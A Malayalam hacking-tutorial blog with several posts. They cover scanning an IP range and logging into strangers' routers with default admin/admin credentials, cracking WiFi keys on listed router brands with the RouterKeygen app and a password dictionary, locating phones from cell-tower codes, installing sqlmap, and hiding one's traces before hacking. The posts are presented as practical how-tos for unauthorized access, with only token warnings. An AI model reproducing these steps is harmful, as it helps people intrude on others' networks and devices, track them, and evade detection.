ഡൈ ഹാര്‍ഡ് പോലെയുള്ള സിനിമകളില്‍ കാണിക്കുന്ന ഒരു സംഭവം ആണ് ഒരു റിമോട്ട് കമ്പ്യൂട്ടര്‍ ഹാക്ക് ചെയ്യുന്നത് എനിട്ട് ആ കമ്പ്യൂട്ടര്‍ നശിപ്പിക്കുന്നത്. ഒരു ഐ.പി അഡ്രെസ്സ് കൊണ്ട് എങ്ങനെയാണ് ആ കമ്പ്യൂട്ടര്‍ നശിപ്പികുന്നത്. സംഭവം തരികിടയണെങ്കില്ലും അങ്ങനെയൊക്കെ ചെയ്യാന്‍ പറ്റും.  നമുക്ക് നോക്കാം എങ്ങനെയാണ് ഒരു റിമോട്ട് കമ്പ്യൂട്ടര്‍ ഹാക്ക് ചെയ്യുന്നത് എന്ന്.
ഇതിനായി നമുക്ക് കുറച്ചു ടൂള്‍സ് ഒപ്പികണം.

#1  Angry IP Scanner
#2 Web Browser
#3 RAT (Remote Administration Tool ) (ഇത് ഡൌണ്‍ലോഡ് ചെയ്തോ പക്ഷെ ഞാന്‍ പറഞ്ഞു തരില്ല എങ്ങനെയാ ഇതുവെച്ചു ഹാക്ക് ചെയ്യാ എന്നത് )

ആദ്യം നിങ്ങള്‍ ഈ സൈറ്റ്ല്‍ പോയി നിങ്ങളുടെ ഐ.പി അഡ്രെസ്സ് ഒപ്പിക്കുക.

http://www.whatismyip.com/


ഇതാ ഞാന്‍ എന്‍റെ ഐ.പി ഒപ്പിച്ചു. ഇതുപോലെ നിങ്ങളുടെ ഐ.പി നോട്ട് ചെയ്തു വെക്കു.
ഇനി Angry IP Scanner ഓപ്പണ്‍ ചെയ്യുക.

ഇനി ctrl+O അമര്‍ത്തുക താഴെ കാണുന്ന ചിത്രത്തില്‍ ഉള്ളതുപോലെ കോണ്ഫിഗ് ചെയ്യുക.

രണ്ടാമത് ctrl + shift + O അമര്‍ത്തിയാല്‍ ഓപ്പണ്‍ ആകുന്ന വിന്‍ഡോയില്‍ ചിത്രത്തില്‍ ഉള്ളത് പോലെ ആവിശ്യമുള്ളവ മൂവ് ചെയ്യുക.


ഇനി മുന്പ് നോട്ട് ചെയ്തു വെച്ച ഐ.പി എടുത്ത് ഇതുപോലെ കൊടുക്കുക


ഞാന്‍ കൊടുത്തത് കണ്ടില്ലേ..? എന്‍റെ ഐ.പിയുടെ റേഞ്ച് മാറ്റി.

ഇനി സ്കാന്‍ സ്റ്റാര്‍ട്ട്‌ ചെയ്യുക കുറച്ചു സമയത്തിനു ശേഷം ആക്റ്റീവ് ഐ.പികള്‍ കാണാം.

അതില്‍ എതെങ്കില്ലും ഒരു ഐ.പി സെലക്ട്‌ ചെയ്ത് റൈറ്റ് ക്ലിക്ക് അമര്‍ത്തി ഓപ്പണ്‍ ഇന്‍ വെബ്‌ ബ്രൌസര്‍ കൊടുക്കുക.


ഉടന്‍തന്നെ നിങ്ങുടെ ബ്രൌസര്‍ ഓപ്പണ്‍ ചെയ്യും അതില്‍ ഒരു പോപ്‌അപ്പ് വരുകയും യുസര്‍ നെയിം പാസ്സ്‌വേര്‍ഡ്‌ എന്നിവ ടൈപ്പ് ചെയ്യാന്‍ പറയും.

അവിടെ 
username:- admin
password:-admin
എന്നിവ കൊടുത്ത് ലോഗിന്‍ ചെയ്യുക ഇനി ലോഗിന്‍ ചെയ്യാന്‍ പറ്റുനില്ലെങ്കില്‍ വേറെ ഒരു ഐ.പി എടുത്ത് നോക്കിയാല്‍ മതിട്ടോ. 

അപ്പൊ കുട്ടികളെ ഇതില്‍ നിന്നും നമുക്ക് എന്ത് മനസിലാക്കാം ഈ ലോകത്ത് ഒന്നും സെകൂര്‍ അല്ല. ഇനി മോന്‍ പോയിട്ട് വേഗം റുട്ടറിന്‍റെ ലോഗ് ഇന്‍ പാസ്സ്‌വേര്‍ഡ്‌ മാറ്റിക്കോ അല്ലങ്കില്‍ അത് വഴി നിങ്ങളുടെ വിടിന്റെ ലാന്‍ഡ്‌ ലൈന്‍ നമ്പര്‍ അടിച്ചു മാറ്റാം.

5 വൈഫൈ ഹാക്കിംഗ് വീഡിയോ ടുടോറിയല്‍സ്


വൈഫൈ നെറ്റ്‌വര്‍ക്ക്കള്‍ ഹാക്ക് ചെയ്യുന്ന വീഡിയോ ടുടോറിയല്‍സ് ആണ് ഇവിടെ പബ്ലിഷ് ചെയ്യുന്നത്

Operating System : Backtrack 5




എങ്ങനെ ഒരു നല്ല ഹാക്കര്‍ ആക്കാം !


ഈ പോസ്റ്റ്‌ "ഹാക്കിംഗ് പഠിക്കുമ്പോള്‍ എവിടെ തുടങ്ങണം" എന്നതിന്‍റെ രണ്ടാം ഭാഗമാണ് തുടര്‍ന്ന് വായിക്കു

പിന്നെ നമ്മള്‍ മലയാളികള്‍ക്ക് ഒരു പ്രത്യേക സ്വഭാവം ഉണ്ട് കഷ്ട്ടപെട്ടു ഒന്നും പഠിക്കില്ല. ഒക്കെ ഒരു തട്ടിപ്പും, തരികിട യിലുടെ കാര്യം സാധിക്കും. അപ്പൊ ഞാന്‍ മുന്‍പ് പറഞ്ഞില്ലേ.. ? (റിയല്‍ഹാക്കര്‍മാര്‍അവര്‍സ്വന്തമായി കോഡ് ചെയ്യ്ത ടൂള്‍സ് ഉപയോഗിച്ച് കൊണ്ടാണ്ണ്‍പെനിട്രേഷൻ ടെസ്ട്കള്‍നടത്തുക ) ആയത്കൊണ്ട് നിങ്ങള്‍ ആരുംതന്നെ പൈത്തൺ പഠിക്കുകയോ അതുകൊണ്ട് എന്തങ്കിലും ടൂള്‍സ് ഉണ്ടാക്കുകയോ ചെയ്യില്ല. അത് മുന്‍കൂട്ടി കണ്ടത് കൊണ്ടാവാം ലിനക്സ്‌ ഹാക്കര്‍മാര്‍ക്ക് വേണ്ടി ഒരു ഓപറേറ്റിങ്ങ്‌ സിസ്റ്റം തന്നെ ഉണ്ടാക്കിയത്.

ബാക്ക്ട്രാക്ക് എന്നാണ് പേര്.. സംഭവം കിടില്ലന്‍ തന്നെയാട്ടോ പക്ഷെ വിന്‍ഡോസ് പോലെ വെറും ക്ലിക്ക് കൊണ്ട് എല്ലാം ചെയ്യാന്‍ പറ്റും എന്ന് കരുതേണ്ട..


ഉബണ്ടു അടിസ്ഥാനമാക്കിയ ഒരു ലിനക്സ് വിതരണമാണ് ബാക്ക്ട്രാക്ക്. കമ്പ്യൂട്ടർ സുരക്ഷ, സൈബർ കുറ്റാന്വോഷണം എന്നിവ ലക്ഷ്യമിട്ടാണ് ഈ വിതരണം പുറത്തിറക്കിയിരിക്കുന്നത്. പിന്നെ ഇതില്‍ ധാരാളം ഹാക്കിങ് ടൂളുകൾ ഉൾപ്പെടുത്തിയിരിക്കുന്നു. ലൈവ് സിഡി, ലൈവ് യുഎസ്ബി എന്നീ സവിശേഷതകൾ ഉള്ളതിനാൽ ഇൻസ്റ്റാൾ ചെയ്യണം എന്ന് നിർബന്ധമില്ല.
അപ്പൊ ഇന്നത്തെ ഹാക്കര്‍മാര്‍ ഇവനെ കൂട്ടുപിടിക്കുന്നു

പിന്നെ ഒരു ഗുഡ് ന്യൂസ്‌ കൂടി ഉണ്ട് ബാക്ക്ട്രാക്കിന്‍റെ അനുജന്‍ ഈയിടെ പുറത്തെറിങ്ങിട്ടുണ്ട് കാളി എന്നാ പേര്,  ചെക്കന്‍ ഫ്രീക് ആണെന്നാ പറഞ്ഞു കേട്ടെ.. നമ്മള്‍ ഇതുവരെ ആളെ പരിജയപെട്ടിട്ടില്ല..  ടൈം കിട്ടണെങ്കില്‍ ഒന്ന് പഞ്ച പിടിച്ചു നോക്കണം.


ഇനി നിങ്ങള്‍ ബാക്ക്ട്രാക്ക് ഡൌണ്‍ലോഡ് ചെയ്തു നോക്കി എന്നിരികട്ടെ നിങ്ങള്‍ എന്ത് ചെയ്യും..? 300ല്‍ അധികം ടൂള്‍സ് ഉണ്ട് അതില്‍ തന്നെ അതില്‍നിന്നും ഏത് ടൂള്‍ എടുക്കും.. എടുത്താല്‍ തന്നെ എന്ത് ചെയ്യും.. ഇങ്ങനെ കുരങ്ങന്‍റെ കൈയില്‍ പൂമാല കിട്ടിയ പോലെ വായും പൊളിച്ചിരിക്കും അല്ലെ..?
തുടരും.....

ഹാക്കിംഗ് പഠിക്കുമ്പോള്‍ എവിടെ തുടങ്ങണം

 ഇന്നു എല്ലാവരും ചോദിക്കുന്ന ഒരു ചോദ്യമാണ് എങ്ങനെയാണ് ഹാക്കര്‍മാര്‍ ഹാക്ക് ചെയ്യുന്നത് & ഹാക്കിംഗ് പഠിക്കുമ്പോള്‍ എവിടെ തുടങ്ങണം എന്ന്. സത്യം പറയുകയാണെങ്കില്‍ ഹാക്കിംഗ് പഠിക്കാന്‍ പ്രതേകിച്ച് സമയമോ സന്ദര്‍ഭമോ ആവിശ്യമില്ല. ഒരല്‍പം ബുദ്ധിയും, താല്‍പര്യവും ഉണ്ടായാല്‍ മതി,
ഒരു കാര്യം മുന്‍കൂട്ടി പറയാണ്. താല്‍പര്യം ഉണ്ടെങ്കില്‍ മാത്രം ഹാക്കിംഗ് പഠിക്കുക അല്ലെങ്കില്‍ ആ വഴിക്ക് പോകരുത്.
ഇനി കുറച്ചു മുന്‍കരുതലുകള്‍ ഞാന്‍’ പറഞ്ഞു തരാം

Pros
# ഇന്നു വളര്‍ന്നു കൊണ്ടിരിക്കുന്ന സൈബര്‍ലോകത്തെ രക്ഷിക്കാനും തകര്‍ക്കാനും ഇവര്‍ക്ക് കഴിയും അതുകൊണ്ട് ഹാക്കിംഗ് എന്നത് സൈബര്‍ ലോകത്ത് ഒഴിച്ചുകൂടാനാവാത്ത ഒരു സംഭവമാണ്.
# ഇന്നു എല്ലാ കമ്പനിയുടെ കിഴില്‍ ഒരു സൈബര്‍ സെക്യൂരിറ്റി ഏക്സ്പേര്‍ട്ട് അത്യാവിശ്യമാണ്.( അതുകൊണ്ട് ഭാവിയില്‍ ഒരു നല്ല ജോബ്‌ കിട്ടാന്‍ ചാന്‍സ് ഉണ്ട്)
#ഫ്രീ ആയി പഠിക്കാം. 
#ഹക്കിംഗ് ടൂള്‍സ് ഇന്‍റര്‍നെറ്റില്‍ സുലഭം.

Cons

# ഭാഗ്യം ഉണ്ടെങ്കില്‍ ജയില്‍വാസം അനുഭവിക്കാം
# 25000 രൂപയാണ് മിനിമം ഫൈന്‍
# ബ്ലാക്ക് ഹാറ്റ് ഹാക്കിംഗ് ആണെങ്കില്‍ ജീവിതം പോയി മക്കളെ.
# പഠിച്ചെടുക്കാന്‍ കുറെ സമയം വേണം
# തല കിടന്നു പുകയും ( ഒരു എക്സ് ഹോസ്റ്റ് ഫാന്‍ തലയില്‍ ഫിറ്റ്‌ ചെയ്യുന്നത് വളരെ നല്ലതാണ് ) 

ഹാക്കിംഗ് പഠിക്കുന്നതിനു മുന്‍പ് സ്വന്തം ass ഹൈഡ് ചെയ്യാന്‍ നോക്കണം. ഞാന്‍ പറഞ്ഞത് മനസിലായില്ലേ ?

ഉദാഹരണം ( ഒരു കള്ളന്‍ ഒരു വിട്ടില്‍ കയറി മോഷ്ട്ടിച്ചു എന്നിരികട്ടെ. പിറ്റേ ദിവസം പോലീസ് വന്നു തെളിവുകള്‍ നോക്കും
കള്ളന്‍റെ വിരലടയാളം, വന്ന വഴി, പിന്നെ ഉപയോഗിച്ച ടൂള്‍സ്
അല്ലെ..?)

ഇതുപോലെത്തന്നെ ഹാക്കന്‍ പോയാല്‍ നിങ്ങളുടെ ഐ.പി അഡ്രെസ്സ്, മോണിറെര്‍ന്‍റെ റിസലുഷന്‍,നിങ്ങള്‍ വന്ന വഴി. ഇവയൊക്കെയാണ് ഒരു ഹാക്കറെ കണ്ടെത്താനുള്ള തെളിവുകള്‍ ആയതുകൊണ്ട് അവ എങ്ങനെയാണ് ഇല്ലാതാക്കുക. എന്ന് ആദ്യം തന്നെ പഠിച്ചതിനു ശേഷം മാത്രമ്മേ സൈബര്‍ ലോകത്തേക്ക് ഹാക്ക് ചെയ്തു പഠിക്കാന്‍ വന്നാ മതി. അല്ലെങ്കില്‍ ഉണ്ടെല്ലോ ഞങ്ങള്‍ നിങ്ങള്‍ടെ കാല്‍തല്ലി ഓടിക്കും ഹും.. പറഞ്ഞെക്കാം.

അപ്പൊ ഇനി തുടങ്ങാം അല്ലെ..?

ആരാണ് ഈ ഹാക്കര്‍ എന്ന് പറയുന്നവര്‍

ഒരു സിസ്റ്റത്തിന്റേയോ കമ്പ്യൂട്ടറിന്റേയോ കമ്പ്യൂട്ടർ നെറ്റ്‌വർക്കിന്റേയോ ആന്തര പ്രവർത്തനങ്ങളേക്കുറിച്ച് താൽപ്പര്യവും ആഴത്തിൽ അതിനേക്കുറിച്ച് അറിവ് നേടുന്നതിൽ സന്തോഷം കണ്ടെത്തുന്നവരെയാണ് ഹാക്കർ എന്ന് വിളിക്കുന്നത് ". ഇത് കുറ്റവാളികളോ കള്ളൻമാരോ അല്ല. ഇന്റര്‍നെറ്റും വെബും ഹാക്കര്‍മാരുടെ സംഭാവനയാണ്. സ്വതന്ത്ര സോഫ്റ്റ്‌വെയർ പ്രസ്ഥാനത്തിന് തുടക്കം കുറിച്ചത് ഇവരാണ്. എന്നാൽ 1980കൾക്ക് ശേഷം മുഖ്യധാരാ മാധ്യമങ്ങൾ കമ്പ്യൂട്ടർ കുറ്റവാളികളെയാണ് ആ പേരിൽ വിളിക്കുന്നത്. മാധ്യമങ്ങൾ ഇത് ശക്തമായി പ്രചരിപ്പിക്കുന്നതിനാൽ ഹാക്കർ എന്നതിന് വേറൊരർത്ഥം ഉണ്ടെന്നു പോലും കൂടുതലാളുകൾക്കും അറിയില്ല.

ഇനി ഹാക്കര്‍മാര്‍ എത്ര തരത്തില്‍ ഉണ്ടെന്നു നോക്കാം.

വൈറ്റ് ഹാറ്റ്
ബ്ലാക്ക് ഹാറ്റ്
ഗ്രേ ഹാറ്റ്

ഇനിയാണ് തുടക്കം 


 ലിനക്സ്‌ ആണ് ഹാക്കര്‍മാരുടെ ഓപറേറ്റിങ്ങ്‌ സിസ്റ്റം എന്ന് അറിയാല്ലോ അപ്പൊ ലിനക്സ്‌ നന്നായി പഠിക്കണം ഒപ്പം തന്നെ റിയല്‍ ഹാക്കര്‍മാര്‍ അവര്‍ സ്വന്തമായി കോഡ് ചെയ്യ്ത ടൂള്‍സ് ഉപയോഗിച്ച് കൊണ്ടാണ്ണ്‍ പെനിട്രേഷൻ ടെസ്ട്കള്‍ നടത്തുക. ആയതുകൊണ്ട് തന്നെ ഒരു ഹൈലെവൽ പ്രോഗ്രാമിങ് ഭാഷ പഠിക്കുന്നത് വളരെ നല്ലതാണ് ഞാന്‍ നിര്‍ദ്ദേശിക്കുന്നത് പൈത്തൺ പഠിക്കണം എന്നാണ്
കമ്പ്യൂട്ടർ പ്രോഗ്രാമിങ് പഠിപ്പിക്കാനായി ഇന്ന് പൈത്തൺ വളരെയധികം ഉപയോഗിക്കുന്നു. വളരെ ലളിതമായ ഭാഷാഘടനയാണ് പൈത്തണിന്റെ ഏറ്റവും വലിയ പ്രത്യേകത. ജാവ, സി തുടങ്ങിയ പ്രോഗ്രാമിങ് ഭാഷകളിൽ ഉള്ളതിലും വളരെ കുറച്ച് ചിഹ്നങ്ങൾ മാത്രമേ പൈത്തണിൽ ഉപയോഗിക്കുന്നുള്ളൂ. ജാവയിലും സി++ ലും ചരങ്ങൾ പ്രോഗ്രാമിൽ ഉപയോഗിക്കുന്നതിനു മുൻപ് കമ്പൈലറിനോട് സൂചിപ്പിക്കേണ്ടതുണ്ട് എന്നാൽ പൈത്തണിൽ ഇതിന്റെ ആവശ്യം ഇല്ല. വളരെ പെട്ടെന്ന് ഉപയോഗപ്രദമായ സോഫ്റ്റ്‌വെയറുകൾ നിർമ്മിക്കാൻ ഇത് സഹായിക്കുന്നു.

തുടരും..

മൊബൈല്‍ ഫോണ്‍ ട്രാക്ക് ചെയ്യാം !

ഇത്തവണ ഒരു തകര്‍പ്പന്‍ ടുടോറിയല്‍ ആണ് നിങ്ങള്‍ക്കു പരിജയപെടുത്തുന്നത് ഒരു മൊബൈല്‍ ഫോണ്‍ന്‍റെ  ലൈവ് ലോകെഷന്‍ ട്രാക്ക് ചെയ്യും വിധമാണ്.

സാധരണ നമ്മള്‍ ഇംഗ്ലീഷ് സിനിമയിലൊക്കെ കണ്ടിട്ടുണ്ടാക്കും ചിലര്‍ ചിലരെ ട്രാക്ക് ചെയ്യുന്നത് ഇല്ലെ..?

നമ്മുടെ Sameer Thahir ന്‍റെ  സിനിമയില്ലേ.. ചാപ്പാ കുരിശു അതില്‍ മൊബൈല്‍ ഫോണ്‍ ട്രാക്ക് ചെയ്യുന്നതു കണ്ടില്ലേ..?
         
സിനിമയില്‍ ഒന്നും കാണിക്കുന്നില്ലെങ്കില്ലും സംഭവം ഉള്ളതു തന്നെയട്ടോ നിങ്ങളുടെ മൊബൈല്‍ ഫോണ്‍ എല്ലാം ട്രാക്ക് ചെയ്യാം..പേടിച്ചോ...?
പേടികേണ്ടട്ടോ..! നിങ്ങളുടെ മൊബൈല്‍ ഫോണ്‍ ട്രാക്ക് ചെയ്യാന്‍ 4 ലെവല്‍ കോഡ്കളാണ് ഉപയോഗിക്കുന്നത്.
MCC - Mobile country code (fixed code and available online)
MNC - Mobile network code (fixedcode and available online)
LAC - Local Area Code (dynamic and required from the handset)
CID - Cell ID (dynamic and required from the handset)
ഇതിലെ LAC - Local Area Code, CID - Cell ID
 കോഡുകള്‍ നിങ്ങള്‍ സഞ്ചരിക്കുന്നതിനു അനുസരിച്ച് മാറികൊണ്ടേ ഇരിക്കും. അതുകൊണ്ട് ഈ കോഡുകള്‍ ഒന്ന് നിങ്ങള്‍ക്കും, നിങ്ങളുടെ സര്‍വീസ് പ്രോവിടെര്‍ക്കും മാത്രമേ അറിയൂ..അതുകൊണ്ട പറഞ്ഞേ പേടികേണ്ട എന്ന്.
(അതെ ഈ കോഡ് instent ആയി ഇമെയില്‍ലേക്ക് അയച്ചു തരുന്ന andorid അപ്പസ് ഉണ്ട്‌ട്ടോ ..! ആ കോഡ് ഗൂഗിള്‍ മാപ് ലിങ്ക് ആയിട്ടാണ് വരുന്നത് ആയതു കൊണ്ടുതന്നെ ഒരു ക്ലിക്ക് കൊണ്ട് തന്നെ നിങ്ങളുടെ ശരിക്കും ഉള്ള location കാണിച്ചു തരുട്ടോ..! ഇനി ഇച്ചിരി പേടിച്ചോ..andorid ഫോണ്‍ ഉള്ളൊരു മാത്രം.)
step1
ഇനി നമുക്ക് ഒരു മൊബൈല്‍ ഫോണ്‍ ട്രാക്ക് ചെയ്തു നോക്കാം..
ഇതിനായി കുറച്ചു സാധനങ്ങള്‍ ഒപ്പികണം.
1. A smartphone/cellphone - Android, IPhone, Blackberry,Nokia - S60 or above, Sony Ericsson - JP or above (other than these not many are supported).
2. GPRS or internet connection.
2. Software to get location codes.
3. A working computer with internet connection and ofcourse Google maps.
step2
ഇവയൊക്കെ ഒപ്പിച്ചോ എന്നാല്‍ രണ്ടാം ഭാഗത്തേക്ക്‌ കടക്കാം.
MCC - Mobile country code (fixed code and available online)
MNC - Mobile network code (fixedcode and available online)

http://en.wikipedia.org/wiki/Mobile_Network_Code
ഈ  ലിങ്കില്‍ കയറി നിങ്ങളുടെ രാജ്യം, നിങ്ങളുടെ മൊബൈല്‍ സര്‍വീസ് പ്രോവിടെര്‍ എന്നിവയ്ക്ക് നേരെ കോഡ് കണ്ടില്ലേ..? അതൊക്കെ ഒപ്പിച്ചോ...മനസിലായില്ല

ഉദാഹരണത്തിന് നിങ്ങളുടെ aircel ആണെങ്കില്‍  MCC 404, MNC 95 ആയിരിക്കും.

step3
ഇനി LAC,CIDയും കിട്ടണം. ഇതു കിട്ടാന്‍ നിങ്ങളുടെ ഫോണില്‍ കുറച്ചു സോഫ്റ്റ്‌വെയര്‍ ഇന്‍സ്റ്റാള്‍ ചെയ്യണം. നിങ്ങളുടെ ഫോണിനെ അനുസരിച്ച  സോഫ്റ്റ്‌വെയറുകളും  താഴെ കൊണ്ടുക്കുന്നു.

Android
-----------------------------------------------------------------------------------------
# Cell Tower Locator:
http://www.appbrain.com/app/cell-tower-locator/tm.app.cellTowerLocator

#   Cell finder:
http://code.google.com/p/codetastrophe/

#   Net Monitor:
http://www.androlib.com/android.application.com-parizene-netmonitor-iCEn.aspx

ഈ സോഫ്റ്റ്‌വെയര്‍ ഒന്നും ഇല്ലാതെ തന്നെ Androidല്‍ നിന്നും കോഡ് കിട്ടാന്‍ ഈ(*#*#4636#*#*) നമ്പര്‍ ഡയല്‍ ചെയ്താ മതിട്ടോ..! അതില്‍ ഫോണ്‍ ഇന്‍ഫര്‍മേഷന്‍ കണ്ടില്ലേ അതിന്‍റെ  അടിയില്‍ LAC,CIDയും ഒള്ളിച്ചിരിക്കുന്നത്.കാണാം.
-----------------------------------------------------------------------------------------
Nokia
-----------------------------------------------------------------------------------------
# Cellspotting:
http://www.cellspotting.com

# Cell track:
http://www.afischer-online.de/sos/celltrack/
-----------------------------------------------------------------------------------------
Sony Ericsson
-----------------------------------------------------------------------------------------
# Network Monitor:
http://www.ottaky.com/midlets.php

# Cellspotting:
http://www.cellspotting.com

ഈ സോഫ്റ്റ്‌വെയര്‍ ഉപയോഗിച്ച് ലെവല്‍ കോഡ്കളെല്ലാം ഒപ്പിച്ചില്ലേ..?
ഹും...എന്‍റെ  കൈയില്‍ Android ഫോണ്‍ ഉള്ളതുകൊണ്ട് ഈ കോഡ് എല്ലാം പെട്ടന്ന് തന്നെ കിട്ടി
MCC - 404
MNC - 94
LAC - 131
CID - 994a
ഇതാണ് എന്‍റെ ഫോണ്‍ന്‍റെ  ലെവല്‍ കോഡ്
step4
ഇനി നമുക്ക് ഈ മൊബൈല്‍ ഫോണ്‍ ട്രാക്കിംഗ്ന്റെ വളരെ പ്രധാനപ്പെട്ട ഭാഗത്തേക്ക് കടക്കാം.

നമ്മള്‍ സാധാരണ location കണ്ടെത്തുക ഗൂഗിള്‍ മാപ് വെച്ചല്ലേ..?
ഈ ഗൂഗിള്‍ മാപ് വര്‍ക്ക്‌ ചെയ്യുന്നത് latitude and longitude വെച്ചാണ്‌ എന്ന് അറിയാലോ...ഈ latitude and longitude ഒക്കെ hex or decimal ഫോര്‍മാറ്റ്‌ വെച്ചാണ്‌ വര്‍ക്ക്‌ ചെയ്യുന്നത്..ആയതുകൊണ്ട്  നിങ്ങളുടെ
LAC -
CID - 
കോഡ്കള്‍ decimal ഫോര്‍മാറ്റിലേക്കു മാറ്റണം  അതിനുവേണ്ടി  
http://www.statman.info/conversions/hexadecimal.html
 ഈ വെബ്സൈറ്റില്‍ പോയി മാറ്റിക്കോ ..!

  അതെ എന്‍റെ
LAC - 131
CID - 994a കോഡ്  decimalലേക്കു  മാറ്റിയപ്പോള്‍ കിട്ടിയ  റിസള്‍ട്ട്‌ 



LAC - 305
CID - 39242 ആണ് 
step5
ഇനി നമുക്ക് മറ്റൊരു  വെബ്സൈറ്റ്ലേക്ക് പോകാം
http://www.open-electronics.org/how-to-find-the-location-with-gsm-cells/
അവിടെ നല്‍കിയ കോളത്തില്‍ ഈ കോഡ് എല്ലാം നല്‍കാം. എതാണ്ട് ഇതുപോലെ


 ഇനിയൊന്നു സെന്‍റ്  അടിച്ചു നോക്ക് നിങ്ങളുടെ ഇപ്പോഴുള്ള location ഗൂഗിള്‍ മാപ്പില്‍ കാണിച്ചു തരും.

എന്‍റെ മൊബൈല്‍ ട്രാക്ക് ചെയ്ത കോഡ് അതെ ഇതും വെച്ച് വിട്ടിലേക്ക്‌ വന്നാല്‍ പണി കിട്ടുട്ടാ..
http://www.open-electronics.org/celltrack/cell.php?hex=0&mcc=404&mnc=95&lac=305&cid=39242
ഈ കോഡ് നിങ്ങള്ക്ക് പ്രൊജക്റ്റ്‌ ആയി ഉപയോഗിക്കാട്ടോ ഈ കോഡ് ഡൌണ്‍ലോഡ് ചെയ്യാന്‍
http://pastebin.com/efr0Qtmf
പിന്നെ ഞാന്‍ മുന്‍പ് പറഞ്ഞില്ലേ ഒരു android ആപ്പ് അതു ഡൌണ്‍ലോഡ് ചെയ്യാന്‍ ഈ ലിങ്ക് സന്ദര്‍ശിക്കുക.
Lookout Plan B
by your best frnd bachooz..

ആൻഡ്രോയ്ഡ് ഫോണ്‍ ഉപയോഗിച്ച് വൈഫൈ ഹാക്ക്


സൈബര്‍ സെക്ന്‍റെ വായനക്കാരെ നിങ്ങള്‍ക്കു ഇന്നു ആൻഡ്രോയ്ഡ് ഫോണ്‍ ഉപയോഗിച്ച് എങ്ങനെയാണ് വൈഫൈ നെറ്റ്‌വര്‍ക്ക്കള്‍  ഹാക്ക് ചെയ്യാം എന്ന് പരിജയപ്പെടുത്തുകയാണ്..

സ്മാർട്ട് ഫോൺ, ടാബ്‌ലറ്റ് കമ്പ്യൂട്ടറുകൾ എന്നിങ്ങനെയുള്ള മൊബൈൽ ഉപകരണങ്ങൾക്കായി നിർമ്മിച്ച ഒരു ഓപ്പറേറ്റിംഗ് സിസ്റ്റം ആണ്‌ ആൻഡ്രോയ്ഡ്. ഗൂഗിൾ നേതൃത്വം നൽകുന്ന ഓപ്പൺ ഹാൻഡ്സെറ്റ് അലയൻസ് എന്ന കൂട്ടായ്മയാണ് ഇത് നിർമ്മിക്കുന്നത്


റുട്ടര്‍ കീഗണ്‍ എന്നാണ് ഈ ആൻഡ്രോയ്ഡ് അപ്ലിക്കേഷന്‍റെ പേര്. ഇതൊരു decipher അപ്ലിക്കേഷന്‍ ആണ് എന്ന് വെച്ചാല്‍ ഇതുവരെയുള്ള വൈഫൈ റുട്ടറുകളില്‍ ഉപയോഗിക്കുന്ന കോമണ്‍ പാസ്സ്‌വേര്‍ഡ്‌കള്‍ കണ്ടെത്തുകയാണ് ഈ അപ്ലിക്കേഷന്‍ ചെയ്യുന്നത്.

നിങ്ങള്‍ക്കു വളരെ അന്യായമായി ഉപയോഗിക്കാന്‍ കഴിയുന്നതും മറ്റു ആൻഡ്രോയ്ഡ് അപ്ലിക്കേഷനില്‍ ഉള്ളതു പോലെ പരസ്യം ഇല്ല എന്ന് ഏടുത്തുപറയേണ്ടതാണ്..

താഴെപ്പറയുന്ന വൈഫൈ റുട്ടറുകള്‍ ഈ അപ്ലിക്കേഷന്‍ കൊണ്ട് ഹാക്ക് ചെയ്യാന്‍ കഴിയും.


1. Thomson based routers (this includes Thomson, SpeedTouch, Orange, Infinitum, BBox, DMax, BigPond, O2Wireless, Otenet, Cyta , TN_private)
2. DLink (only some models)
3. Pirelli Discus
4. Eircom
5. Verizon FiOS (only some routers supported)
6. Alice AGPF
7. FASTWEB Pirelli and Telsey
8. Huawei (some Infinitum)
9. Wlan_XXXX or Jazztel_XXXX
10. Wlan_XX (only some are supported)
11. Ono (P1XXXXXX0000X)
12. WlanXXXXXX, YacomXXXXXX and WifiXXXXXX
13. Sky V1 routers
14. Clubinternet.box v1 and v2
15. InfostradaWifi

ഇനി അപ്ലിക്കേഷന്‍ വര്‍ക്ക്‌ ചെയ്യാന്‍ ഒരു പാസ്സ്‌വേര്‍ഡ്‌ ഡിക്ഷ്ണറി ഡൌണ്‍ലോഡ് ചെയ്യണം ഇതിനു ഏകദേശം 28Mb വരും. പിന്നെ സാധരണ ആൻഡ്രോയ്ഡ് ഫോണ്‍കള്ല്‍ വൈഫൈ ഹാക്ക് ചെയ്യാന്‍ 2 മിനിറ്റും വളെരെ പവര്‍ഫുള്‍ ആയ Samsung Galaxy S പോലെയുള്ള ഫോണ്‍കളില്‍ വെറും 10സെക്കന്‍ഡ്‌ മാത്രമാണ് ഈ അപ്ലിക്കേഷന്‍ എടുക്കുന്നത്.

ഈ അപ്ലിക്കേഷന്‍ കോഡ് പ്രൊജക്റ്റ്‌ലേക്ക് നിങ്ങളെയും ക്ഷണിക്കുന്നു
http://code.google.com/p/android-thomson-key-solver/

റുട്ടര്‍ കീഗണ്‍ ഇവിടെ നിന്നും ഡൌണ്‍ലോഡ് ചെയ്യാം
http://android-thomson-key-solver.googlecode.com/files/RouterKeygen_v2_8_1.apk

പാസ്സ്‌വേര്‍ഡ്‌ ഡിക്ഷ്ണറി  പാക്കും ഇവിടെ നിന്നും ഡൌണ്‍ലോഡ് ചെയ്യാം
http://android-thomson-key-solver.googlecode.com/files/RKDictionary.dic

കൂടുതല്‍ ആൻഡ്രോയ്ഡ്  വൈഫൈ ഹാക്കിംഗ് സോഫ്റ്റ്‌വെയര്‍കള്‍ നിങ്ങള്‍ക്കു ഇവിടെ നിന്നും ഡൌണ്‍ലോഡ് ചെയ്യാം
http://androidadn.com/apps/wifi-for-android/

എസ്.ക്യു.എൽ. മാപ് വിന്‍ഡോസ്7ല്‍ ഇന്‍സ്റ്റാള്‍ ചെയ്യാം



ഹാക്കര്‍മാരുടെ സ്വന്തം സുഹൃത്തായ എസ്.ക്യു.എൽ. മാപ് എന്നാ അട്ടോമാടിക്  എസ്.ക്യു.എൽ. ഇഞ്ഞെക്ഷന്‍ ടൂള്‍ എങ്ങനെയാണ് വിന്‍ഡോസ് സെവെനില്‍ ഇന്‍സ്റ്റാള്‍ ചെയ്യാമെന്നും അത് എങ്ങനെയാണ് പ്രവര്‍ത്തിപ്പിക്കുക എന്നുംകൂടി പരിജയപ്പെടുത്തുകയാണ് സൈബര്‍ സെക്.
ആദ്യം തന്നെ നമുക്ക് അവിശ്യമുള്ള സോഫ്റ്റ്‌വെയര്‍കള്‍ ഡൌണ്‍ലോഡ് ചെയ്യണം

1 എസ്.ക്യു.എൽ. മാപ് ഇവിടെ നിന്നും ഡൌണ്‍ലോഡ് ചെയ്യാം.

